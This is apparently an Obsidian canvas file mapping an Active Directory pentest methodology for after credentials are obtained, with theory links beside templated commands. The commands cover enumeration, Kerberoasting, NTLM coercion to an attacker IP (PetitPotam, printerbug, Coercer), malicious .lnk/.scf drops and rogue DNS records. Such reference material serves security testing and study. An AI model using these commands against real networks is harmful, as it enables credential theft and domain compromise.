{
	"nodes":[
		{"id":"882a6b5335e73f8b","type":"group","x":-2640,"y":-1280,"width":3880,"height":5920,"color":"4","label":"GOT CREDENTIALS"},
		{"id":"21059ec469b0e878","type":"group","x":1760,"y":3220,"width":1080,"height":766,"color":"3","label":"MITM (LISTEN & RELAY)"},
		{"id":"99e6c78b86a551a9","type":"group","x":1760,"y":4180,"width":1080,"height":766,"color":"2","label":"CRACKING HASH"},
		{"id":"f04e85c6a2a00903","type":"group","x":1760,"y":2260,"width":1080,"height":763,"color":"#32a5ff","label":"KERBEROS DELEGATION"},
		{"id":"e04c10a52534ceb9","type":"group","x":-4000,"y":1300,"width":1080,"height":760,"label":"NO CREDENTIALS"},
		{"id":"fb39e80de60efc1c","type":"group","x":1760,"y":-1597,"width":1080,"height":760,"color":"#1a57ff","label":"GOT USERNAME"},
		{"id":"5c5e342763536aea","type":"group","x":1760,"y":-580,"width":1080,"height":760,"color":"#aa8c46","label":"NEED CREDENTIALS VULNS"},
		{"id":"5776d27a34ca0b5a","type":"group","x":1760,"y":380,"width":1080,"height":760,"color":"#324bff","label":"DACL ABUSE"},
		{"id":"4cef0584fb410524","type":"group","x":1760,"y":1300,"width":1080,"height":760,"color":"#7806a0","label":"ADCS ABUSE"},
		{"id":"fc42becea24d7f4f","type":"text","text":"# GOT CREDENTIALS","x":-2560,"y":-145,"width":340,"height":50,"color":"4"},
		{"id":"e3ffd5a20150a9b9","type":"text","text":"# Enumerate users\n\n>[!info] Theory\n> - link\n\n```bash\n🕷️ nxc smb <dc_ip> -u '<user>' -p '<password>' --users\n```","x":-1788,"y":-1120,"width":1292,"height":280},
		{"id":"eca58af665f99fb6","type":"text","text":"# Enumerate SMB shares\n\n>[!info] Theory\n> - link\n\n```bash\n🕷️ nxc smb '<ip_range>' -u '<user>' -p '<password>' --shares [--get-file \\\\'<filename>' '<filename>']\n🕷️ nxc smb '<ip_range>' -u '<user>' -p '<password>' -M spider_plus\n```","x":-1788,"y":-800,"width":1292,"height":300},
		{"id":"3191199c932386e4","type":"text","text":"# Enumerate LDAP\n\n>[!info] Theory\n> - https://www.thehacker.recipes/ad/recon/ldap\n\n```bash\n⚪ ldeep ldap -u '<users>' -p '<password>' -d '<domain>' -s ldap://'<dc_ip>' all '<backup_folder>'\n```","x":-1788,"y":-460,"width":1292,"height":285},
		{"id":"6b2d922a3189f5b7","type":"text","text":"# 🔥 Bloodhound\n>[!info] Theory \n>- https://www.thehacker.recipes/ad/recon/bloodhound/#theory\n   \n## Bloodhound Legacy\n\n```shell\n# Ingestors\n⚪ bloodhound-python -d  '<domain>' -u '<user>' -p '<password>' -gc '<dc_fqdn>' -c all \n🔵 Sharphound.exe -c all -d '<domain>'\n```\n\n## Bloodhound CE\n\n```shell\n# Ingestors\n⚪ bloodhound-ce.py -d '<domain>' -u '<user>' -p '<password>' -dc '<dc_fqdn>' -c All --zip\n```","x":-1788,"y":-130,"width":1292,"height":520},
		{"id":"fa8ceab7561c9017","type":"text","text":"# MITM (LISTEN & RELAY)","x":760,"y":2875,"width":399,"height":50,"color":"3"},
		{"id":"c1cef499aeee5760","type":"file","file":"ATTACKS/ADCS ABUSE.canvas","x":1840,"y":1378,"width":920,"height":600,"color":"#7806a0"},
		{"id":"c49ba6bbb39a4b14","type":"file","file":"ATTACKS/KERBEROS DELEGATION ABUSE.canvas","x":1840,"y":2343,"width":920,"height":600,"color":"#32a5ff"},
		{"id":"bfa017692095357b","type":"file","file":"ATTACKS/MITM (LISTEN & RELAY).canvas","x":1840,"y":3300,"width":920,"height":600,"color":"3"},
		{"id":"0991a985fd03c471","type":"file","file":"ATTACKS/CRACKING HASH.canvas","x":1840,"y":4256,"width":920,"height":600,"color":"2"},
		{"id":"c0ebf569930b8473","type":"text","text":"# USER FOUND","x":-397,"y":-1007,"width":249,"height":55,"color":"#1438a3"},
		{"id":"49f6cecb879526d6","type":"text","text":"# CREDENTIALS FOUND","x":-397,"y":-676,"width":377,"height":53,"color":"4"},
		{"id":"8037a0bff72a3ba9","type":"text","text":"# DELEGATION","x":-397,"y":-347,"width":250,"height":60,"color":"#16446f"},
		{"id":"9351ffc7c5ac4307","type":"text","text":"# ACL\n","x":-395,"y":10,"width":125,"height":60,"color":"#0a0ed6"},
		{"id":"8f8da12e9ec3c4ad","type":"file","file":"INTERACTIVE-MAP.canvas","x":-3920,"y":1380,"width":920,"height":600},
		{"id":"5e4f721a0516941b","type":"text","text":"# Exploit known vulnerabilities ","x":-1788,"y":1520,"width":1292,"height":80},
		{"id":"e7d5fdcec101f17b","type":"text","text":"# 🔥 Coerce\n\n>[!info] Theory  \n>- https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/","x":-1788,"y":1660,"width":1292,"height":200},
		{"id":"0fa4cb41934110f0","type":"text","text":"# ACL\n","x":-396,"y":-437,"width":125,"height":60,"color":"#0a0ed6"},
		{"id":"68e0d15e0d219c8d","type":"text","text":"# USER FOUND","x":-396,"y":-257,"width":249,"height":55,"color":"#1438a3"},
		{"id":"be4097e299736044","type":"text","text":"# USER FOUND","x":-395,"y":190,"width":249,"height":55,"color":"#1438a3"},
		{"id":"bdca0115d4ad6516","type":"text","text":"# TICKET  FOUND (TGS)","x":-396,"y":576,"width":363,"height":50,"color":"2"},
		{"id":"f2dae966020b8c0b","type":"text","text":"# ADCS","x":-396,"y":920,"width":158,"height":60,"color":"#7906a2"},
		{"id":"f88a7edc8be6f154","type":"text","text":"# SCCM","x":-390,"y":1250,"width":158,"height":60},
		{"id":"a707551cf74e5f15","type":"text","text":"# DELEGATION","x":-396,"y":100,"width":250,"height":60,"color":"#16446f"},
		{"id":"049bd1797c93835b","type":"file","file":"ATTACKS/GOT USERNAME.canvas","x":1840,"y":-1518,"width":920,"height":600,"color":"#1450f0"},
		{"id":"1cbe5aa76ced72e8","type":"file","file":"ATTACKS/NEED CREDENTIALS VULNS.canvas","x":1840,"y":-500,"width":920,"height":600,"color":"#aa8c46"},
		{"id":"0b24cdf9416213bd","type":"file","file":"ATTACKS/PERMISSIONS ABUSE.canvas","x":1840,"y":460,"width":920,"height":600,"color":"#324bff"},
		{"id":"5c3bc22fd89782fa","type":"text","text":"# Webdav\n>[!info] Theory\n>- https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/webclient\n>- https://redfoxsec.com/blog/an-in-depth-exploration-into-webclient-abuse/\n\n```shell\n# find webdav clients\n🕷️ nxc smb '<ip_range>' -u '<user>' -p '<password>' -M webdav\n# Start webdav with Documents.searchConnector-ms file\n🕷️ nxc smb '<target>' -u '<user>' -p '<password>' -M drop-sc\n# Add attack computer in dns\n⚪ dnstool.py -u '<domain>'\\'<user>' -p '<password>' --record '<attackname>' --action add --data '<attacker_ip>' '<dc_ip>'\n","x":-636,"y":2680,"width":1316,"height":440},
		{"id":"f59c4b8d68643727","type":"text","text":"# RPC call\n\n## Printerbug\n>[!info] Theory\n>- https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn\n\n>[!example] Tools\n>- https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py\n\n```shell\n # Check for open pipes\n🟣 rpcdump.py '<domain>'/'<user>':'<password>'@'<dc_ip>'| grep MS-RPRN\n # Exploit\n⚪ printerbug.py '<domain>'/'<username>':'<password>'@'<printer_ip>' '<listener_ip>'\n ```\n ---\n  ## PetitPotam\n  \n>[!info] Theory\n>- https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-efsr\n\n>[!example] Tools\n>- https://github.com/topotam/PetitPotam\n\n```shell\n# Exploit\n⚪ Petitpotam.py -d '<domain>' -u '<user>' -p '<password>' '<attacker_ip>' '<target_ip>'\n```\n---\n## Coercer\n  \n>[!info] Theory\n>- link\n\n>[!example] Tools\n>- https://github.com/p0dalirius/Coercer\n\n```shell\n# Exploit\n⚪ coercer.py -d '<domain>' -u '<user>' -p '<password>' -t '<target>' -l '<attacker_ip>'\n```","x":-636,"y":3175,"width":1316,"height":1360},
		{"id":"c4b74446bcf53250","type":"text","text":"# Kerberoasting\n>[!info] Theory\n>- https://www.thehacker.recipes/ad/movement/kerberos/\n\n```shell\n# Retrieve TGS\n🟣 GetUserSPNs.py -request -dc-ip '<dc_ip>' '<domain>'/'<user>':'<password>' \n🔵 Rubeus.exe kerberoast /format:hashcat\n```","x":-1788,"y":445,"width":1292,"height":311},
		{"id":"ec1c26516c7e5a30","type":"text","text":"# SMB NTLM COERCE","x":760,"y":3830,"width":356,"height":50,"color":"3"},
		{"id":"4016bea75313a1b0","type":"text","text":"# 🔥 Enumerate ADCS\n>[!info] Theory\n>- https://research.ifcr.dk/certipy-2-0-bloodhound-new-escalations-shadow-credentials-golden-certificates-and-more-34d1c26f0dc6\n\n```shell\n# Find vulnerable templates\n⚪ certipy find -u '<user>'@'<domain>' -p '<password>' -dc-ip '<dc_ip>'\n```","x":-1788,"y":810,"width":1292,"height":280},
		{"id":"50fdb88dc23a5a0e","type":"text","text":"# 🔥 Enumerate SCCM\n>[!info] Theory\n>- https://www.thehacker.recipes/ad/movement/sccm-mecm/\n\n```shell\n# find Vulnerable templates\n⚪ ldeep ldap -u '<user>' -p '<password>' -d '<domain>' -s ldap://'<dc_ip>' sccm\n```","x":-1788,"y":1130,"width":1292,"height":300},
		{"id":"1c683337bfd401e2","type":"text","text":"# Drop file\n## .lnk\n\n>[!info] Theory\n>- link\n\n```shell\n🕷️ nxc smb '<dc_ip>' -u '<user>' -p '<password>' -M slinky -o NAME='<filename>' SERVER='<attacker_ip>'\n ```\n \n ## .scf\n\n>[!info] Theory\n>- link\n\n```shell\n🕷️ nxc smb <dc_ip> -u '<user>' -p '<password>' -M sucffy -o NAME='<filename>' SERVER='<attacker_ip>'\n ```\n\n","x":-636,"y":2040,"width":1316,"height":580},
		{"id":"34ac6c362ab5c5e2","type":"text","text":"# NEED CREDENTIALS VULNS","x":-390,"y":1530,"width":470,"height":60,"color":"#aa8c46"},
		{"id":"c91fe059ff8f5789","type":"text","text":"# MITM (LISTEN & RELAY)","x":-390,"y":1735,"width":399,"height":50,"color":"3"}
	],
	"edges":[
		{"id":"5d0dc42c3330d393","fromNode":"c4b74446bcf53250","fromSide":"right","toNode":"bdca0115d4ad6516","toSide":"left"},
		{"id":"99ea5dcbd39b6208","fromNode":"6b2d922a3189f5b7","fromSide":"right","toNode":"9351ffc7c5ac4307","toSide":"left"},
		{"id":"59adb65ca8c32461","fromNode":"6b2d922a3189f5b7","fromSide":"right","toNode":"a707551cf74e5f15","toSide":"left"},
		{"id":"8ab4423407e4f7ce","fromNode":"6b2d922a3189f5b7","fromSide":"right","toNode":"be4097e299736044","toSide":"left"},
		{"id":"c35a1f50a6d5814d","fromNode":"4016bea75313a1b0","fromSide":"right","toNode":"f2dae966020b8c0b","toSide":"left"},
		{"id":"9f0a8fd42e0d15da","fromNode":"e7d5fdcec101f17b","fromSide":"right","toNode":"c91fe059ff8f5789","toSide":"left"},
		{"id":"b6c054f9bb601ffd","fromNode":"fc42becea24d7f4f","fromSide":"right","toNode":"c4b74446bcf53250","toSide":"left"},
		{"id":"45fd5f82039cdb1c","fromNode":"fc42becea24d7f4f","fromSide":"right","toNode":"6b2d922a3189f5b7","toSide":"left"},
		{"id":"490a8e672c4876e9","fromNode":"fc42becea24d7f4f","fromSide":"right","toNode":"4016bea75313a1b0","toSide":"left"},
		{"id":"7109ed9e61c27fc6","fromNode":"fc42becea24d7f4f","fromSide":"right","toNode":"e7d5fdcec101f17b","toSide":"left"},
		{"id":"b5d6bb320e4d7e86","fromNode":"e7d5fdcec101f17b","fromSide":"bottom","toNode":"5c3bc22fd89782fa","toSide":"left"},
		{"id":"2ecbe68b956ce660","fromNode":"e7d5fdcec101f17b","fromSide":"bottom","toNode":"f59c4b8d68643727","toSide":"left"},
		{"id":"88922a5bedcec1ef","fromNode":"5c3bc22fd89782fa","fromSide":"right","toNode":"fa8ceab7561c9017","toSide":"left"},
		{"id":"b3313c8ec0a65607","fromNode":"f59c4b8d68643727","fromSide":"right","toNode":"ec1c26516c7e5a30","toSide":"left"},
		{"id":"7759dd31df370f88","fromNode":"fc42becea24d7f4f","fromSide":"right","toNode":"eca58af665f99fb6","toSide":"left"},
		{"id":"d14c4717904a11de","fromNode":"eca58af665f99fb6","fromSide":"right","toNode":"49f6cecb879526d6","toSide":"left"},
		{"id":"60d1fd3926562320","fromNode":"e3ffd5a20150a9b9","fromSide":"right","toNode":"c0ebf569930b8473","toSide":"left"},
		{"id":"4f852c891efcda54","fromNode":"fc42becea24d7f4f","fromSide":"right","toNode":"e3ffd5a20150a9b9","toSide":"left"},
		{"id":"0ed2bd201e602fe4","fromNode":"3191199c932386e4","fromSide":"right","toNode":"8037a0bff72a3ba9","toSide":"left"},
		{"id":"6e900f814a193eb4","fromNode":"3191199c932386e4","fromSide":"right","toNode":"0fa4cb41934110f0","toSide":"left"},
		{"id":"f3afe4b9007c9165","fromNode":"3191199c932386e4","fromSide":"right","toNode":"68e0d15e0d219c8d","toSide":"left"},
		{"id":"c7d5823ee771575d","fromNode":"50fdb88dc23a5a0e","fromSide":"right","toNode":"f88a7edc8be6f154","toSide":"left"},
		{"id":"2c8c7eaa8b2871bd","fromNode":"fc42becea24d7f4f","fromSide":"right","toNode":"50fdb88dc23a5a0e","toSide":"left"},
		{"id":"cbc0c2d906f7d3a7","fromNode":"e7d5fdcec101f17b","fromSide":"bottom","toNode":"1c683337bfd401e2","toSide":"left"},
		{"id":"d90dd3b3e3306f43","fromNode":"8f8da12e9ec3c4ad","fromSide":"right","toNode":"882a6b5335e73f8b","toSide":"left"},
		{"id":"ec1e38bbda2888cc","fromNode":"882a6b5335e73f8b","fromSide":"right","toNode":"049bd1797c93835b","toSide":"left","color":"#1f75ff"},
		{"id":"26ac19636651aec4","fromNode":"5e4f721a0516941b","fromSide":"right","toNode":"34ac6c362ab5c5e2","toSide":"left"},
		{"id":"7d950696b223af22","fromNode":"fc42becea24d7f4f","fromSide":"right","toNode":"5e4f721a0516941b","toSide":"left"},
		{"id":"b607da5030c97d75","fromNode":"882a6b5335e73f8b","fromSide":"right","toNode":"1cbe5aa76ced72e8","toSide":"left","color":"#aa8c46"},
		{"id":"009aab69e585a4ec","fromNode":"882a6b5335e73f8b","fromSide":"right","toNode":"0b24cdf9416213bd","toSide":"left","color":"6"},
		{"id":"225c75f42bfbe22f","fromNode":"882a6b5335e73f8b","fromSide":"right","toNode":"c1cef499aeee5760","toSide":"left","color":"#772079"},
		{"id":"6b5eda7b60054daf","fromNode":"882a6b5335e73f8b","fromSide":"right","toNode":"c49ba6bbb39a4b14","toSide":"left","color":"#2c6c8c"},
		{"id":"19c25b0ada4f6474","fromNode":"882a6b5335e73f8b","fromSide":"right","toNode":"bfa017692095357b","toSide":"left","color":"3"},
		{"id":"007df42bb29936b7","fromNode":"882a6b5335e73f8b","fromSide":"right","toNode":"0991a985fd03c471","toSide":"left","color":"2"}
	]
}